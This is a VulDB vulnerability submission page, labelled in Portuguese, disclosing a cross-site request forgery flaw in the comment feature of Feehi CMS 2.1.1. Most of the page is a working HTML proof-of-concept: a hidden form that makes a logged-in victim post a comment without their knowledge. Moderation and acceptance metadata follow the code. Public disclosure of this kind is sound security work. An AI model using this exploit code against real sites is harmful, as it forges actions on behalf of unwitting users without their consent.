| Título | Feehi Cms 2.1.1 Csrf Vulnerability Exploit |
|---|
| Descrição | # Google Dork: [not applicable]
# Date: 14082022
# Exploit Author: haruntamokur
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
# Version: 2.1.1 (REQUIRED)
# Tested on: Windows 10
# CVE : [not applicable]
When you log in application with user and password, you reach “Post my comment” tab. The function has Csrf exploit. If you write exploit code like following, you can exploit this vulnerability.
URL: http://localhost:8080/index.php?r=article%2Fview&id=22#comment-7
Exploit Code
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8080/index.php?r=article%2Fcomment" method="POST">
<input type="hidden" name="_csrf" value="5EgNi95Un03ZlbGkl3dj2u_lxkDWSlBLz0h4q__4to-rMUHNl2bxCJ2h4calBlacv7_2NqAdJBmpDxKYmsmCuA==" />
<input type="hidden" name="Comment[aid]" value="22" />
<input type="hidden" name="Comment[content]" value="CSRFTest" />
<input type="hidden" name="comment_post_ID" value="114" />
<input type="hidden" name="Comment[reply_to]" value="0" />
<input type="hidden" name="akismet_comment_nonce" value="32920dc775" />
<input type="hidden" name="ak_js" value="101" />
<input type="hidden" name="comment_mail_notify" value="comment_mail_notify" />
<input type="hidden" name="Comment[nickname]" value="harun" />
<input type="hidden" name="Comment[email]" value="" />
<input type="hidden" name="Comment[website_url]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
|
|---|
| Utilizador | harun.tamokur (UID 35839) |
|---|
| Submissão | 15/11/2022 11h45 (há 4 anos) |
|---|
| Moderação | 16/11/2022 08h53 (21 hours later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 213788 [FeehiCMS Post My Comment Tab Falsificação de Pedido entre Sites] |
|---|
| Pontos | 17 |
|---|